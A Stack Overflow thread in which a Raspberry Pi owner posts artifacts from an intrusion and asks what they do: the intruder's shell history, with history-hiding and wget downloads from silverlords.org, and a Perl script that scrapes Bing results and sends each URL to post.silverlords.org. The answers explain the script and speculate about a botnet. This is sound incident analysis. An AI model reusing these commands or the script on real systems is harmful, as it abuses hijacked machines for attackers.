# After securing my webserver (rpi) from foreign ssh logins, I found this perl script on my computer. Can someone tell me what it does?

Tags: linux, perl, security, raspberry-pi

There was an account named "user" that would be used for these logins, which would be from all over the world. I spent several hours yesterday securing the computer and there have been no logins since that time.  I `awk`ed the /var/log/auth.log into a list of ips ordered from oldest to most recent login, if that somehow helps:

```
    185.145.252.26
    185.145.252.36
    109.236.83.3
    104.167.2.4
    217.23.13.125
    185.38.148.238
    194.88.106.146
    43.225.107.70
    194.88.107.163
    192.162.101.217
    62.112.11.88
    194.63.141.141
    194.88.107.162
    74.222.19.247
    194.88.107.164
    178.137.184.237
    167.114.210.108
    5.196.76.41
    118.70.72.25
    109.236.91.85
    62.112.11.222
    91.195.103.172
    62.112.11.94
    62.112.11.90
    188.27.75.73
    194.88.106.197
    194.88.107.165
    38.84.132.236
    91.197.235.11
    62.112.11.79
    62.112.11.223
    144.76.112.21
    185.8.7.144
    91.230.47.91
    91.230.47.92
    91.195.103.189
    91.230.47.89
    91.230.47.90
    109.236.89.72
    195.228.11.82
    109.236.92.184
    46.175.121.38
    94.177.190.188
    171.251.76.179
    173.212.230.79
    144.217.75.30
    5.141.202.235
    31.207.47.36
    62.112.11.86
    217.23.2.183
    217.23.1.87
    154.122.98.44
    41.47.42.128
    41.242.137.33
    171.232.175.131
    41.114.123.190
    1.54.115.72
    108.170.8.185
    86.121.85.122
    91.197.232.103
    160.0.224.69
    217.23.2.77
    212.83.171.102
    41.145.17.243
    62.112.11.81
    82.79.252.36
    41.114.63.134
    5.56.133.126
    109.120.131.106
    76.68.108.151
    113.20.108.27
    46.246.61.20
    146.185.28.52
    45.32.219.199
```

One of the first things I did after changing the password of the "user" account was running `history`, which gave me this result:

```
1  sudo
2  sudo
3  sudo service vsftpd stop
4  su clay
5  unset PROMPT_COMMAND
6  PS1='[PEXPECT]\$'
7  wget http://xpl.silverlords.org/bing -O bing
8  wget http://www.silverlords.org/wordlist/xaaaaaaaaqb.txt -O word ; perl bing word
9  wget http://www.silverlords.org/wordlist/xaaaaaaaaiv.txt -O word ; perl bing word
10  uname
11  n
12  uname
13  history
```

I then ran `cat /home/user/.bash_history` for more but what I already had was all that was in the file.
In "user"'s home folder, I found four files, `bing`,  `output.13.19.27.txt` , `output.16.10.38.txt`, and  `word`.  All were empty except bing, which was a perl script:

```
#!/usr/bin/perl                                                            
use strict;                                                          
use LWP::UserAgent;                                                                 
use LWP::Simple;                                                                    
use POSIX qw(strftime);                                                             
my $data = strftime "%H.%M.%S", gmtime;                                             

my $ARGC = @ARGV;                                                                   
if ($ARGC !=1) {                                                                    
        printf "$0 arquivo.txt\n";                                                  
        printf "Coded by: Al3xG0 x@~\n";                                            
        exit(1);                                                                    
}
my $st = rand();
my $filename = $ARGV[0];
print "Input Filename - $filename\n";

my $max_results = 2;

open (IFH, "< $filename") or die $!;
open (OFH, "> output.${data}.txt") or die $!;

while (<IFH>) {
        next if /^ *$/;
        my $search_word = $_;
        $search_word =~ s/\n//;
        print "Results for -$search_word-\n";
        for (my $i = 0; $i < $max_results; $i += 10) {
                my $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
                $b->timeout(30); $b->env_proxy;
                my $c = $b->get('http://www.bing.com/search?q=' . $search_word . '&first=' . $i . '&FORM=PERE')->content;
                my $check = index($c, 'sb_pagN');
                if ($check == -1) { last; }
                while (1) { 
                        my $n = index($c, '<h2><a href="');
                        if ($n == -1) { last; }
                        $c = substr($c, $n + 13);
                        my $s = substr($c, 0, index($c, '"'));
                        my $save = undef;
                        if ($s =~ /http:\/\/([^\/]+)\//g) { $save = $s; }
                        print "$save\n";
                        #if ($save !~ /^ *$/) { print OFH "$save\n"; print "$save\n"};
                        getprint("http://post.silverlords.org/sites.php?site=$save");
                }
        }
        print "\n";
}
close (IFH);
close (OFH);
```

I don't know perl, and after spending so much time with sshd config, blacklists, etc., I don't really have the time or energy to learn.  If anyone could tell me what the script does and/or what the attackers were trying to do that would be great.

Thanks so much,
Clay

EDIT: I found this article that could explain the purpose of the bing search script: https://www.wired.com/2013/02/microsoft-bing-fights-botnets/

Comment: I'm voting to close this question as off-topic because "I don't know [language] and I don't have the time or energy to learn but what does this code do?" is not a question about programming.

Comment: @melpomene I partially agree, but it's a nice riddle for Pentecost. ;-)

Comment: Stack Overflow is a site for programming and development questions. This question appears to be off-topic because it is not about programming or development. See [What topics can I ask about here](http://stackoverflow.com/help/on-topic) in the Help Center. Perhaps [Super User](http://superuser.com/) or [Unix & Linux Stack Exchange](http://unix.stackexchange.com/) would be a better place to ask. Also see [Where do I post questions about Dev Ops?](http://meta.stackexchange.com/q/134306)

Answer (score 4, accepted):

It reads the file passed on the command line, and uses each line as a phrase to do a Bing search. It prints the URL of every search result returned by Bing, and also sends it to `http://post.silverlords.org/sites.php?site=$save` where `$save`is the URL

It used to write the same URLs to the `output.HH.MM.SS.txt` files, but that line has been commented out so the files are created but left empty

So it's just a command-line `bing` search; nothing too sinister. Essentially nothing that they couldn't run on any machine that has access to `bing`

Comment: @melpomene: The contents of those text files in the `wget` commands are pretty weird. I don't recognise the data.

Comment: Wow thanks.  Any idea why they would do this though?

Comment: None at all. Do you understand the stuff in those text files? They are probably the files that contain the search phrases passed to the `bing` program

Comment: I just added an answer which is more a comment on your answer. Not sure how to handle this; perhaps I'll delete it tomorrow.

Comment: It  may be a botnet that is doing millions of Bing searches across many machines and sending the results back to silverlords.org. That's all I can think of.

Comment: That's exactly what I thought. And given the list of IPs the OP's computer was logged-in from his computer was a nice victim.

Answer (score 1):

This is not an answer but merely an overlong comment about the observations I made.

- When I issue the `wget ... -O word` commands, it works for me and I receive two files full of words. Looks like a list of random words, maybe passwords for a brute-force attack:

**first file:** (excerpt)

```
kalcio
kalciolaria
kalciolariaconia2
kalciov
kalcistn
kalcit
kalcit
kalcita
...
```

**second file:** (excerpt)

```
curious2s
curious2saab95
curious2:saab95
curious2see
curious2see
curious2squeak2
curious2swingineverton
Curious2tender
curious2tryany2asdfg
CURIOUS2TRYIT
curious2trythre092703
...
```

- The Perl script `bing` is written by someone who's not familiar with Perl. He uses beginner's style from bad tutorials and/or obviously doesn't know the language very well.
- Because he issued `su clay` he might know that such a user (presumably *your* user) even exists on that machine, without examining `/etc/passwd` or similar.
- As @borodin and @melpomene say, the script searches `bing` for these words and then parses the resulting bing-page for URLs and then submits them to `post.silverlords.org`.

As the script currently is, it only abuses your computer's CPU and network to get its work done. The "work" is to massively submit Bing searches for all the words and collect the results at `post.silverlords.org`.